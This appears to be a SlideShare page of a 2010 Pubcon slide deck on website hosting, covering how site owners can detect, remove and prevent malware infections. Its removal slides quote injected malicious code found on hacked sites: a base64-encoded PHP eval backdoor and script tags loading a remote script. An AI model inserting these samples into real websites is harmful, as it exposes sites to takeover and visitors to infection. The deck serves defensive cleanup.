SlideShare a Scribd company logo

2010 11 pubcon_hendison-hosting

Download as PPT, PDF
S
shendison

This document discusses malware prevention and removal for websites. It begins by providing background on the speaker and his hosting business. It then emphasizes that malware is the #1 threat to websites, as it can prevent visitors, drain ad spending, and hurt search engine rankings. The document provides tips for identifying malware through warnings from users, browsers, search engines, and Google Webmaster Tools. It describes common malware patterns and provides steps for thorough removal, such as searching for suspicious scripts and code. Finally, it stresses the importance of prevention through secure passwords, updating software, and having backup and restoration processes. The overall message is that malware poses severe risks and careful prevention and response strategies are needed.

TechnologyDesign
1 of 34
Download to read offline
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
About Scott Hendison • Began “hosting“ websites in 1997 with one server in our retail computer store, with standard DSL • Grew to 11 servers then switched to a sort of “datacenter co-op“ a few years ago, all in the same local facility in Gresham Oregon. • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
Web Hosting and SEO • I've been on this panel three times and discussed – – shared vs. dedicated servers – Static vs. shared IP addresses – Apache 1 vs Apache 2 – Apache vs. Windows – .htaccess – mod_rewrite – Windows IIS rewriting options – Server speed and performance – and other riveting subjects trying to better relate to SEO
Web Hosting and SEO Speed and Performance • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced next day • Not a risky prediction, considering Adwords Quality Scores • Speed as ranking factor began “counting” April 9, 2010 • Google has two great tools – Page Speed for Firefox – (download inside Webmaster Tools) – Google Chrome (right click in Chrome and “inspect element”)
But I‘m Not Talking About Speed • Far more important • The #1 killer of websites • The thing that drives visitors away in droves • Drains PPC money as fast as possible • Google stops people from even arriving at your site! • I’m talking about…
Malware
Malware • Nothing can fully protect users from getting viruses • Viruses can steal the BEST passwords & logins • If you don’t get one, contractors, employees or family probably will, infecting your network. • People should use index cards and a fireproof safe • But that’s pretty unrealistic, so learn to deal with disasters
Malware identification • Nearly 15% of “our” sites were hacked in 2010 • Most were self inflicted through laziness and stupidity • The hacks really didn’t vary all that much • Getting rid of hacks can be a headache • Getting back into Google isn’t very difficult • Protecting yourself FROM hacks is getting easier, but… • Sadly, the hacking keeps getting easier…
Malware • Identification • Removal • Prevention
Identification • You can get notified by a client or customer • You discover it in a browser or AV warning • You can see your site flagged in the SERPS • You can get notified by Google WMT – (sometimes)
Malware Warnings
Warnings in the SERPS!
Interstitial Page
#1 Conversion Killer • Nothing hurts you more than if people wont come to your site in the first place. • Once you‘ve identified a problem, what can you do? – Clean up the offending code – Beg Google for a clean bill of health
Removal • Most hacks we saw were pretty similar • Cross Site Scripting (XSS) and SQL Injection • Adding links and adding hosted scripts • Hackers want to add links to your site • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords • Not too technical - Look for strange javascripts!
Removal
Removal
Removal • If WMT is no help, then look at files manually • Use backups and file comparison tools • Check recent change dates • Look for things that don‘t belong, often in pages named index, home, and default - in .php and .html extensions • Look in headers and footers too
Removal <?php eval(base64_decode('aWYoIWlzc2V0KCRtNzc5djEp KXtmdW5jdGlvbiBtNzc5digkcyl7aWYocHJlZ19tY <snip> XRjaF9hbGwoJyM8c2NyaXB0KC4qPyk8L3NjJ203 Nzl2MicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlK CRfUE9TVFsnZSddKSk7')); ?> (<snipped> goes on for dozens of lines )
Removal • Usually index, home, header and footer – <script src=http://domainX.ac.jp/course/VIVID.php ></script> • And in most or all javascript files - document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');"
Removal • Not all that complicated, just tedious. • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too. • Overly simplistic to say “clean it up“ but others have likely had your same problem. • Google for it w/ quotes to find YOUR exact code. • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
Once You‘re Clean
Once You‘re Clean Write something like this – Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution. Thank you, Scott Hendison
Once You‘re Clean • Document your process and improve it • Get ready to have it happen again • Begin to protect yourself – Get paranoid.
Prevention • FTP Passwords – Don't share FTP access – make new users instead. – NEVER use a dictionary word in the password – Use at least 8 characters (some people will say 20+) – Mix Upper Case, Lower Case, numerals and symbols – CHANGE passwords without telling your dev people every few months. • Stop using plain old FTP - WinSCP is free SFTP
Prevention • Using a CMS? • Find the documentation on locking it down • Do ALL system updates • Do ALL released security patches • Routine maintenance (just like WMT & Analytics) • More popular = more vulnerable, like WordPress
Prevention • Nearly 8% of all sites are now WordPress* • We work in Wordpress 95% of the time • Same thing that makes it great makes it riskier • Amazing plugins have been developed for safety • Common threats have easy solutions * Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
Prevention
Prevention
Prevention
Prevention
Prevention • Total prevention may be impossible. Be prepared! • Backup restoration sometimes faster than repair • Hosts can may keep backups 7 days, or even less! • Get weekly (or daily) backups in place & off-host • Store a year of monthly backups at AWS • Document the entire restore process and TEST • Your site hack is generally not the webhosts fault!
Take-aways • FAR more important than your SEO • Dig into Webmaster Tools malware area • Change all FTP Passwords asap, & consider SFTP • Check for updated versions on forms, and on your CMS • Get backup and restore processes in place NOW
Thank You WordPress Lunch Table Thursday 1:30 Scott Hendison Search Commander, Inc. shendison@seoautomatic.com

More Related Content

PPT
2010 11 pubcon_hendison_wordpress
shendison
 
PPTX
Installing WordPress The Right Way
Chris Burgess
 
PPTX
WordPress Plugins and Security
Think Media Inc.
 
PDF
WordPress Security 101 - Meetup Nairobi March 2020
stk_jj
 
PPT
Blog World 2010 - How to Keep Your Blog from Being Hacked
Brian Layman
 
PPTX
Let’s write a plugin
Brian Layman
 
PPTX
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Brian Layman
 
PPTX
Word press development for non developers
Jessica C. Gardner
 
2010 11 pubcon_hendison_wordpress
shendison
 
Installing WordPress The Right Way
Chris Burgess
 
WordPress Plugins and Security
Think Media Inc.
 
WordPress Security 101 - Meetup Nairobi March 2020
stk_jj
 
Blog World 2010 - How to Keep Your Blog from Being Hacked
Brian Layman
 
Let’s write a plugin
Brian Layman
 
Neo word press meetup ehermits - how to keep your blog from being hacked 2012
Brian Layman
 
Word press development for non developers
Jessica C. Gardner
 

What's hot (20)

PDF
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
WordCamp Sydney
 
PPTX
How to create a WordPress Site
MuhammadUsaid2
 
PDF
Get Involved with WordPress
Mario Peshev
 
PPTX
Speed up Your Joomla Site for Ultimate Performance
JoomlaDay Australia
 
PPTX
WordPress Workshop
Terri Orlowski
 
PPTX
Squeeze Maximum Performance From Your Joomla Website
SiteGround.com
 
PDF
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
Tobias Zander
 
PDF
Word press workshop powerpoint
erezwe
 
PDF
WordPress Security 101 - WordCamp Nairobi 2019
stk_jj
 
PDF
Isomorphic WordPress Applications with NodeifyWP
Taylor Lovett
 
PDF
WordPress Theme Reviewers Team
Mario Peshev
 
KEY
HTML5shim
Michael MacDonald
 
PPTX
Building the basics (WordPress Ottawa 2014)
Christopher Ross
 
PDF
My Website Can Vote - The Challenges of Maintaining a 20-year-old Website
Kristine Howard
 
PDF
Head Slapping WordPress Security
Chris Burgess
 
PDF
WordPress Meetup Bandung - December 2014
Fikri Rasyid
 
PPTX
WordPress Security
Nathan Platt
 
PDF
Theming in WordPress - Where do I Start?
Edmund Turbin
 
PPTX
DNN Summit: Robots.txt & Multi-Site DNN Instances
Will Strohl
 
PPTX
NEPA BlogCon 2013 - WordPress Customization & Security
Michelle Davies (Hryvnak)
 
What Multisite can do for You - Anthony Cole - WordCamp Sydney 2012
WordCamp Sydney
 
How to create a WordPress Site
MuhammadUsaid2
 
Get Involved with WordPress
Mario Peshev
 
Speed up Your Joomla Site for Ultimate Performance
JoomlaDay Australia
 
WordPress Workshop
Terri Orlowski
 
Squeeze Maximum Performance From Your Joomla Website
SiteGround.com
 
"Turbo boost your website" aka BigPipe at Webinale 2014 in Berlin
Tobias Zander
 
Word press workshop powerpoint
erezwe
 
WordPress Security 101 - WordCamp Nairobi 2019
stk_jj
 
Isomorphic WordPress Applications with NodeifyWP
Taylor Lovett
 
WordPress Theme Reviewers Team
Mario Peshev
 
HTML5shim
Michael MacDonald
 
Building the basics (WordPress Ottawa 2014)
Christopher Ross
 
My Website Can Vote - The Challenges of Maintaining a 20-year-old Website
Kristine Howard
 
Head Slapping WordPress Security
Chris Burgess
 
WordPress Meetup Bandung - December 2014
Fikri Rasyid
 
WordPress Security
Nathan Platt
 
Theming in WordPress - Where do I Start?
Edmund Turbin
 
DNN Summit: Robots.txt & Multi-Site DNN Instances
Will Strohl
 
NEPA BlogCon 2013 - WordPress Customization & Security
Michelle Davies (Hryvnak)
 
Ad

Similar to 2010 11 pubcon_hendison-hosting (20)

PDF
Security Presentation for Boulder WordPress Meetup
Angela Bowman
 
PDF
How to Increase Security on your Wordpress Website
MeganGood12
 
PPTX
Wordpress Security & Hardening Steps
Plasterdog Web Design
 
PDF
I Have My WordPress Site Now What?
Michele Butcher-Jones
 
PPTX
WordPress Security and Best Practices
Robert Vidal
 
PPTX
WordPress security
Shelley Magnezi
 
PPTX
Making & Keeping WordPress Secure
Chad Warner
 
PPTX
Intro to SEO
Affiliate Summit
 
PDF
Your WordPress Site is and is not Hacked - You don't know until you check
Angela Bowman
 
PDF
גיא אילון Websense
lihig
 
PDF
WordCamp Mid-Atlantic WordPress Security
Brad Williams
 
PDF
Keep Your SIte Secure
Michele Butcher-Jones
 
PDF
Your WordPress Website Is/Not Hacked
Angela Bowman
 
PPTX
Word press security 101
Kojac801
 
PPTX
Hacked - What do you do now?
Tony Perez
 
PDF
WordPress Security 101
Manifest Creative
 
PDF
WordPress Security Essentials
Angela Bowman
 
PPTX
Reducing Server Resources: Improve Costs, SEO, Conversions & UX
Michael Jones
 
PDF
Your WordPress Site Is Getting Hacked; What Should You Do.pdf
WebConnect Pvt Ltd
 
PPT
WordPress Security
Brad Williams
 
Security Presentation for Boulder WordPress Meetup
Angela Bowman
 
How to Increase Security on your Wordpress Website
MeganGood12
 
Wordpress Security & Hardening Steps
Plasterdog Web Design
 
I Have My WordPress Site Now What?
Michele Butcher-Jones
 
WordPress Security and Best Practices
Robert Vidal
 
WordPress security
Shelley Magnezi
 
Making & Keeping WordPress Secure
Chad Warner
 
Intro to SEO
Affiliate Summit
 
Your WordPress Site is and is not Hacked - You don't know until you check
Angela Bowman
 
גיא אילון Websense
lihig
 
WordCamp Mid-Atlantic WordPress Security
Brad Williams
 
Keep Your SIte Secure
Michele Butcher-Jones
 
Your WordPress Website Is/Not Hacked
Angela Bowman
 
Word press security 101
Kojac801
 
Hacked - What do you do now?
Tony Perez
 
WordPress Security 101
Manifest Creative
 
WordPress Security Essentials
Angela Bowman
 
Reducing Server Resources: Improve Costs, SEO, Conversions & UX
Michael Jones
 
Your WordPress Site Is Getting Hacked; What Should You Do.pdf
WebConnect Pvt Ltd
 
WordPress Security
Brad Williams
 
Ad

Recently uploaded (20)

PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
KodekX | Application Modernization Development
KodekX
 
PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
PDF
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
PDF
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
PDF
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
SHREYAS PHANSE
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PDF
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
PDF
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
PPTX
A Presentation on Artificial Intelligence
memembruh336
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 
Encapsulation theory and applications.pdf
gurumoop
 
KodekX | Application Modernization Development
KodekX
 
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
Advanced methodologies resolving dimensionality complications for autism neur...
IAESIJAI
 
TokAI - TikTok AI Agent : The First AI Application That Analyzes 10,000+ Vira...
SOFTTECHHUB
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Diabetes mellitus diagnosis method based random forest with bat algorithm
IAESIJAI
 
Shreyas Phanse Resume: Experienced Backend Engineer | Java • Spring Boot • Ka...
SHREYAS PHANSE
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
Bridging biosciences and deep learning for revolutionary discoveries: a compr...
IAESIJAI
 
CIFDAQ's Market Insight: SEC Turns Pro Crypto
CIFDAQ
 
A Presentation on Artificial Intelligence
memembruh336
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
Empathic Computing: Creating Shared Understanding
Mark Billinghurst
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
blackmambaettijean
 
Teaching material agriculture food technology
LiaRayya
 
Digital-Transformation-Roadmap-for-Companies.pptx
David Malick Dieng
 
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Peter Tan
 
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
ReZa AdineH
 

2010 11 pubcon_hendison-hosting

  • 1. Hosting & SEO Scott Hendison Search Commander, Inc. SEO Automatic
  • 2. About Scott Hendison • Began “hosting“ websites in 1997 with one server in our retail computer store, with standard DSL • Grew to 11 servers then switched to a sort of “datacenter co-op“ a few years ago, all in the same local facility in Gresham Oregon. • Not our primary business, but we still host over 1000 domains today, as well as maintain end-user hosting accounts on several major hosts.
  • 3. Web Hosting and SEO • I've been on this panel three times and discussed – – shared vs. dedicated servers – Static vs. shared IP addresses – Apache 1 vs Apache 2 – Apache vs. Windows – .htaccess – mod_rewrite – Windows IIS rewriting options – Server speed and performance – and other riveting subjects trying to better relate to SEO
  • 4. Web Hosting and SEO Speed and Performance • I “predicted” at Pubcon 2009 that speed will soon matter for organic, then Matt Cutts announced next day • Not a risky prediction, considering Adwords Quality Scores • Speed as ranking factor began “counting” April 9, 2010 • Google has two great tools – Page Speed for Firefox – (download inside Webmaster Tools) – Google Chrome (right click in Chrome and “inspect element”)
  • 5. But I‘m Not Talking About Speed • Far more important • The #1 killer of websites • The thing that drives visitors away in droves • Drains PPC money as fast as possible • Google stops people from even arriving at your site! • I’m talking about…
  • 7. Malware • Nothing can fully protect users from getting viruses • Viruses can steal the BEST passwords & logins • If you don’t get one, contractors, employees or family probably will, infecting your network. • People should use index cards and a fireproof safe • But that’s pretty unrealistic, so learn to deal with disasters
  • 8. Malware identification • Nearly 15% of “our” sites were hacked in 2010 • Most were self inflicted through laziness and stupidity • The hacks really didn’t vary all that much • Getting rid of hacks can be a headache • Getting back into Google isn’t very difficult • Protecting yourself FROM hacks is getting easier, but… • Sadly, the hacking keeps getting easier…
  • 10. Identification • You can get notified by a client or customer • You discover it in a browser or AV warning • You can see your site flagged in the SERPS • You can get notified by Google WMT – (sometimes)
  • 12. Warnings in the SERPS!
  • 14. #1 Conversion Killer • Nothing hurts you more than if people wont come to your site in the first place. • Once you‘ve identified a problem, what can you do? – Clean up the offending code – Beg Google for a clean bill of health
  • 15. Removal • Most hacks we saw were pretty similar • Cross Site Scripting (XSS) and SQL Injection • Adding links and adding hosted scripts • Hackers want to add links to your site • Hackers want to add scripts to infect users with viruses which in turn, steal more passwords • Not too technical - Look for strange javascripts!
  • 18. Removal • If WMT is no help, then look at files manually • Use backups and file comparison tools • Check recent change dates • Look for things that don‘t belong, often in pages named index, home, and default - in .php and .html extensions • Look in headers and footers too
  • 20. Removal • Usually index, home, header and footer – <script src=http://domainX.ac.jp/course/VIVID.php ></script> • And in most or all javascript files - document.write('<script src=http://domainX.ac.jp/course/VIVID.php ></script>');"
  • 21. Removal • Not all that complicated, just tedious. • Search files for <script src=http:// and make sure you recognize them all, and search for eval(base64 too. • Overly simplistic to say “clean it up“ but others have likely had your same problem. • Google for it w/ quotes to find YOUR exact code. • Get a quick look at your site w/ free tool at http://UnmaskParasites.com
  • 23. Once You‘re Clean Write something like this – Thank you for identifying our malware problem, and we believe all is now cleaned up. We have verified that we're clean using an online scanner - http://www.unmaskparasites.com - and would appreciate a speedy resolution. Thank you, Scott Hendison
  • 24. Once You‘re Clean • Document your process and improve it • Get ready to have it happen again • Begin to protect yourself – Get paranoid.
  • 25. Prevention • FTP Passwords – Don't share FTP access – make new users instead. – NEVER use a dictionary word in the password – Use at least 8 characters (some people will say 20+) – Mix Upper Case, Lower Case, numerals and symbols – CHANGE passwords without telling your dev people every few months. • Stop using plain old FTP - WinSCP is free SFTP
  • 26. Prevention • Using a CMS? • Find the documentation on locking it down • Do ALL system updates • Do ALL released security patches • Routine maintenance (just like WMT & Analytics) • More popular = more vulnerable, like WordPress
  • 27. Prevention • Nearly 8% of all sites are now WordPress* • We work in Wordpress 95% of the time • Same thing that makes it great makes it riskier • Amazing plugins have been developed for safety • Common threats have easy solutions * Supposedly said my Matt Mullenweg at one of the 2010 WordCamp, but I can‘t prove it.
  • 32. Prevention • Total prevention may be impossible. Be prepared! • Backup restoration sometimes faster than repair • Hosts can may keep backups 7 days, or even less! • Get weekly (or daily) backups in place & off-host • Store a year of monthly backups at AWS • Document the entire restore process and TEST • Your site hack is generally not the webhosts fault!
  • 33. Take-aways • FAR more important than your SEO • Dig into Webmaster Tools malware area • Change all FTP Passwords asap, & consider SFTP • Check for updated versions on forms, and on your CMS • Get backup and restore processes in place NOW
  • 34. Thank You WordPress Lunch Table Thursday 1:30 Scott Hendison Search Commander, Inc. shendison@seoautomatic.com